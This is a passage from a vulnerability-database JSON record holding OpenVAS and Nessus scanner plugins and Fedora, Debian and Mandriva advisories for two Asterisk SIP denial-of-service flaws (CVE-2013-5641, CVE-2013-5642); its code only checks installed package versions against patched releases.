{"id": "OPENVAS:1361412562310866888", "vendorId": null, "type": "openvas", "bulletinFamily": "scanner", "title": "Fedora Update for asterisk FEDORA-2013-15567", "description": "The remote host is missing an update for the 'asterisk' package(s) announced via the referenced advisory.", "published": "2013-09-18T00:00:00", "modified": "2019-03-15T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310866888", "reporter": "Copyright (c) 2013 Greenbone Networks GmbH", "references": ["https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115639.html", "2013-15567"], "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "immutableFields": [], "lastseen": "2019-05-29T18:38:13", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2013-2961", "CPAI-2013-3492"]}, {"type": "cve", "idList": ["CVE-2013-5641", "CVE-2013-5642"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2749-1:E342B"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2013-5641", "DEBIANCVE:CVE-2013-5642"]}, {"type": "fedora", "idList": ["FEDORA:6763920EE9", "FEDORA:ADB8421654"]}, {"type": "freebsd", "idList": ["FD2BF3B5-1001-11E3-BA94-0025905A4771"]}, {"type": "gentoo", "idList": ["GLSA-201401-15"]}, {"type": "mageia", "idList": ["MGASA-2013-0266"]}, {"type": "nessus", "idList": ["8006.PRM", "8007.PRM", "ASTERISK_AST_2013_004.NASL", "ASTERISK_AST_2013_005.NASL", "DEBIAN_DSA-2749.NASL", "FEDORA_2013-15560.NASL", "FEDORA_2013-15567.NASL", "FREEBSD_PKG_FD2BF3B5100111E3BA940025905A4771.NASL", "GENTOO_GLSA-201401-15.NASL", "MANDRIVA_MDVSA-2013-223.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310121112", "OPENVAS:1361412562310802063", "OPENVAS:1361412562310866890", "OPENVAS:1361412562310892749", "OPENVAS:866888", "OPENVAS:866890", "OPENVAS:892749"]}, {"type": "osv", "idList": ["OSV:DSA-2749-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2013-5641", "UB:CVE-2013-5642"]}]}, "score": 
{"value": -0.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2013-2961", "CPAI-2013-3492"]}, {"type": "cve", "idList": ["CVE-2013-5641", "CVE-2013-5642"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2013-5642"]}, {"type": "fedora", "idList": ["FEDORA:ADB8421654"]}, {"type": "freebsd", "idList": ["FD2BF3B5-1001-11E3-BA94-0025905A4771"]}, {"type": "nessus", "idList": ["ASTERISK_AST_2013_005.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310866890", "OPENVAS:892749"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2013-5642"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2013-5641", "epss": "0.900290000", "percentile": "0.981740000", "modified": "2023-03-15"}, {"cve": "CVE-2013-5642", "epss": "0.553970000", "percentile": "0.970740000", "modified": "2023-03-15"}], "vulnersScore": -0.5}, "_state": {"dependencies": 1678916735, "score": 1678916296, "epss": 1678936357}, "_internal": {"score_hash": "6141eaa807c8b5fcbe696b509f5b2413"}, "pluginID": "1361412562310866888", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-15567\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.866888\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 10:07:05 +0530 (Wed, 18 Sep 2013)\");\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-15567\");\n\n\n script_tag(name:\"affected\", value:\"asterisk on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-15567\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115639.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'asterisk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == 
\"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.5.1~2.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "naslFamily": "Fedora Local Security Checks"}
{"fedora": [{"lastseen": "2020-12-21T08:17:51", "description": "Asterisk is a complete PBX in software. It runs on Linux and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in three protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. ", "cvss3": {}, "published": "2013-09-14T02:35:21", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: asterisk-11.5.1-2.fc18", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2013-09-14T02:35:21", "id": "FEDORA:ADB8421654", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/2RZ5C3AZZZJ4AS7OIR6XAFFWDQJASRDJ/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Asterisk is a complete PBX in software. It runs on Linux and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in three protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. 
", "cvss3": {}, "published": "2013-09-14T02:37:45", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: asterisk-11.5.1-2.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2013-09-14T02:37:45", "id": "FEDORA:6763920EE9", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/B34ZJSP7C7DUTOFWVJXXOADTS75M6XN4/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "osv": [{"lastseen": "2022-08-10T07:09:45", "description": "\nColin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony \ntoolkit -, which could result in denial of service.\n\n\nFor the oldstable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze11.\n\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.8.13.1~dfsg-3+deb7u1.\n\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\n\nWe recommend that you upgrade your asterisk packages.\n\n\n", "cvss3": {}, "published": "2013-09-02T00:00:00", "type": "osv", "title": "asterisk - several", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 
5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2022-08-10T07:09:04", "id": "OSV:DSA-2749-1", "href": "https://osv.dev/vulnerability/DSA-2749-1", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2023-01-11T14:58:40", "description": "Updated asterisk packages fix security vulnerabilities :\n\nA remotely exploitable crash vulnerability exists in the SIP channel driver if an ACK with SDP is received after the channel has been terminated. The handling code incorrectly assumes that the channel will always be present (CVE-2013-5641).\n\nA remotely exploitable crash vulnerability exists in the SIP channel driver if an invalid SDP is sent in a SIP request that defines media descriptions before connection information. The handling code incorrectly attempts to reference the socket address information even though that information has not yet been set (CVE-2013-5642).", "cvss3": {}, "published": "2013-09-02T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : asterisk (MDVSA-2013:223)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:asterisk", "p-cpe:/a:mandriva:linux:asterisk-addons", "p-cpe:/a:mandriva:linux:asterisk-devel", "p-cpe:/a:mandriva:linux:asterisk-firmware", 
"p-cpe:/a:mandriva:linux:asterisk-gui", "p-cpe:/a:mandriva:linux:asterisk-plugins-alsa", "p-cpe:/a:mandriva:linux:asterisk-plugins-calendar", "p-cpe:/a:mandriva:linux:asterisk-plugins-cel", "p-cpe:/a:mandriva:linux:asterisk-plugins-corosync", "p-cpe:/a:mandriva:linux:asterisk-plugins-curl", "p-cpe:/a:mandriva:linux:asterisk-plugins-dahdi", "p-cpe:/a:mandriva:linux:asterisk-plugins-fax", "p-cpe:/a:mandriva:linux:asterisk-plugins-festival", "p-cpe:/a:mandriva:linux:asterisk-plugins-ices", "p-cpe:/a:mandriva:linux:asterisk-plugins-jabber", "p-cpe:/a:mandriva:linux:asterisk-plugins-jack", "p-cpe:/a:mandriva:linux:asterisk-plugins-ldap", "p-cpe:/a:mandriva:linux:asterisk-plugins-lua", "p-cpe:/a:mandriva:linux:asterisk-plugins-minivm", "p-cpe:/a:mandriva:linux:asterisk-plugins-mobile", "p-cpe:/a:mandriva:linux:asterisk-plugins-mp3", "p-cpe:/a:mandriva:linux:asterisk-plugins-mysql", "p-cpe:/a:mandriva:linux:asterisk-plugins-ooh323", "p-cpe:/a:mandriva:linux:asterisk-plugins-osp", "p-cpe:/a:mandriva:linux:asterisk-plugins-oss", "p-cpe:/a:mandriva:linux:asterisk-plugins-pgsql", "p-cpe:/a:mandriva:linux:asterisk-plugins-pktccops", "p-cpe:/a:mandriva:linux:asterisk-plugins-portaudio", "p-cpe:/a:mandriva:linux:asterisk-plugins-radius", "p-cpe:/a:mandriva:linux:asterisk-plugins-saycountpl", "p-cpe:/a:mandriva:linux:asterisk-plugins-skinny", "p-cpe:/a:mandriva:linux:asterisk-plugins-snmp", "p-cpe:/a:mandriva:linux:asterisk-plugins-speex", "p-cpe:/a:mandriva:linux:asterisk-plugins-sqlite", "p-cpe:/a:mandriva:linux:asterisk-plugins-tds", "p-cpe:/a:mandriva:linux:asterisk-plugins-unistim", "p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail", "p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-imap", "p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-plain", "p-cpe:/a:mandriva:linux:lib64asteriskssl1", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2013-223.NASL", "href": "https://www.tenable.com/plugins/nessus/69540", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) 
Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:223. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69540);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_bugtraq_id(62021, 62022);\n script_xref(name:\"MDVSA\", value:\"2013:223\");\n\n script_name(english:\"Mandriva Linux Security Advisory : asterisk (MDVSA-2013:223)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated asterisk packages fix security vulnerabilities :\n\nA remotely exploitable crash vulnerability exists in the SIP channel\ndriver if an ACK with SDP is received after the channel has been\nterminated. The handling code incorrectly assumes that the channel\nwill always be present (CVE-2013-5641).\n\nA remotely exploitable crash vulnerability exists in the SIP channel\ndriver if an invalid SDP is sent in a SIP request that defines media\ndescriptions before connection information. 
The handling code\nincorrectly attempts to reference the socket address information even\nthough that information has not yet been set (CVE-2013-5642).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-004.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-005.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-addons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-cel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-corosync\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-dahdi\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-fax\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-festival\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-ices\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-jabber\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-jack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-lua\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-minivm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-mobile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-mp3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-ooh323\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-osp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-oss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-pktccops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-portaudio\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-radius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-saycountpl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-skinny\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-speex\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-tds\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-unistim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-plain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64asteriskssl1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif 
(isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-addons-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-devel-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-firmware-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-gui-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-alsa-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-calendar-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-cel-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-corosync-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-curl-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-dahdi-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-fax-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-festival-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-ices-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-jabber-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-jack-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", 
cpu:\"x86_64\", reference:\"asterisk-plugins-ldap-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-lua-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-minivm-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-mobile-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-mp3-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-mysql-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-ooh323-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-osp-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-oss-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-pgsql-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-pktccops-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-portaudio-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-radius-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-saycountpl-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-skinny-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-snmp-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-speex-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", 
reference:\"asterisk-plugins-sqlite-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-tds-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-unistim-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-voicemail-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-voicemail-imap-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-voicemail-plain-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64asteriskssl1-11.5.1-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:59:37", "description": "- Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> - 11.5.1-2 :\n\n - Enable hardened build BZ#954338\n\n - Significant clean ups\n\n - Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> - 11.5.1-1 :\n\n - The Asterisk Development Team has announced security releases for Certified\n\n - Asterisk 1.8.15, 11.2, and Asterisk 1.8, 10, and 11.\n The available security releases\n\n - are released as versions 1.8.15-cert2, 11.2-cert2, 1.8.23.1, 10.12.3, 10.12.3-digiumphones,\n\n - and 11.5.1.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2013-09-14T00:00:00", "type": "nessus", "title": "Fedora 19 : asterisk-11.5.1-2.fc19 (2013-15560)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:asterisk", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2013-15560.NASL", "href": "https://www.tenable.com/plugins/nessus/69886", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora 